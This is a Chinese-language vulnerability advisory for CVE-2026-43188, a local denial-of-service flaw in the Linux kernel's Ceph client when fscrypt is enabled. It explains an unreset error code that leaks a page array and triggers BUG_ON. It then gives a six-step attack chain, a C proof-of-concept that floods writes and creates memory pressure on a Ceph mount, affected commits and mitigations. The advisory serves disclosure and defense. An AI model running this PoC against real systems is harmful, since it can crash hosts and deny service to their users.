CVE-2026-43188 Linux内核Ceph模块拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-43188

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的Ceph文件系统模块存在一个逻辑缺陷，该漏洞与fscrypt（文件系统加密）的处理有关。当系统尝试移动加密页面时，如果内存分配失败，错误处理代码未能正确重置返回状态码。这导致本应被忽略的分配失败错误被传播至主写回循环，进而导致关键的内存结构未被释放。最终，内核在检测到资源泄漏时触发BUG_ON断言，造成系统崩溃（Oops）。本地低权限攻击者可利用此漏洞导致系统不可用。

技术细节

该漏洞位于Linux内核的Ceph客户端代码，具体涉及`ceph_process_folio_batch()`函数。当启用fscrypt时，`move_dirty_folio_in_page_array()`函数需要为每个folio分配bounce buffer以存储加密数据。对于首个folio之后的页面，分配使用`GFP_NOWAIT`标志，这在内存紧张时容易失败。漏洞的根源在于`ceph_process_folio_batch()`复用变量`rc`来存储子函数的返回值。当子函数返回错误时，代码仅将页面重新标记为脏页，但未将`rc`重置为0。这导致非致命的分配失败错误被错误地传播到上层调用者。上层循环无法处理此错误，跳过了释放`ceph_wbc.pages`的步骤。在下一次迭代中，`ceph_allocate_page_array()`检测到该页面数组未被释放，触发`BUG_ON()`，导致内核崩溃。

攻击链分析

STEP 1

步骤1：获取访问权限

攻击者获取本地系统的低权限用户访问权限。

STEP 2

步骤2：环境准备

确认系统挂载了Ceph文件系统并启用了fscrypt加密功能。

STEP 3

步骤3：触发内存压力

攻击者运行程序执行大量写操作，并配合内存分配操作，制造系统内存紧张状态。

STEP 4

步骤4：诱导内核错误

在内存压力下，诱导内核在move_dirty_folio_in_page_array中分配bounce buffer失败（GFP_NOWAIT）。

STEP 5

步骤5：利用漏洞逻辑

由于ceph_process_folio_batch未重置错误码，导致错误传播，页面数组泄漏。

STEP 6

步骤6：系统崩溃

内核在后续操作中检测到泄漏，触发BUG_ON，导致系统崩溃（拒绝服务）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-43188
 * Concept: Trigger memory pressure during writeback on a Ceph mount with fscrypt.
 * This attempts to induce GFP_NOWAIT allocation failures in the kernel.
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>

#define MOUNT_POINT "/mnt/ceph" // Replace with actual Ceph mount point
#define FILE_NAME "trigger.dat"
#define BUFFER_SIZE (4 * 1024 * 1024) // 4MB chunks

void consume_memory() {
    // Attempt to pressure memory to trigger GFP_NOWAIT failures
    void *ptrs[100];
    for(int i = 0; i < 100; i++) {
        ptrs[i] = malloc(10 * 1024 * 1024); // Alloc 10MB
        if(!ptrs[i]) break;
    }
    // Free immediately to loop, or hold to increase pressure
    for(int i = 0; i < 100; i++) {
        if(ptrs[i]) free(ptrs[i]);
    }
}

int main() {
    char path[256];
    snprintf(path, sizeof(path), "%s/%s", MOUNT_POINT, FILE_NAME);
    
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) {
        perror("open failed");
        return 1;
    }

    char *buffer = malloc(BUFFER_SIZE);
    if (!buffer) {
        perror("malloc failed");
        close(fd);
        return 1;
    }
    memset(buffer, 'A', BUFFER_SIZE);

    printf("Starting write operations to trigger bug...");
    fflush(stdout);

    // Write loop to force writeback
    for (int i = 0; i < 1000; i++) {
        write(fd, buffer, BUFFER_SIZE);
        // Sync occasionally to force writeback operations
        if (i % 10 == 0) {
            fsync(fd);
            consume_memory(); // Try to disrupt allocation
        }
    }

    free(buffer);
    close(fd);
    unlink(path);
    printf("Exploit attempt finished.\n");
    return 0;
}

影响范围

Linux Kernel < commit 4c0d84c788d89c167abf0bf84fd37890c4c84f08

Linux Kernel < commit 707104682e3c163f7c14cdd6b07a3e95fb374759

Linux Kernel < commit 746840c87d76b614b14d9337c466ff022fc49823

防御指南

临时缓解措施

如果无法立即升级内核，建议暂时禁用Ceph文件系统上的fscrypt加密功能，以规避该代码路径的执行。此外，应严格限制本地用户的计算资源配额，防止其制造足以触发GFP_NOWAIT分配失败的内存压力。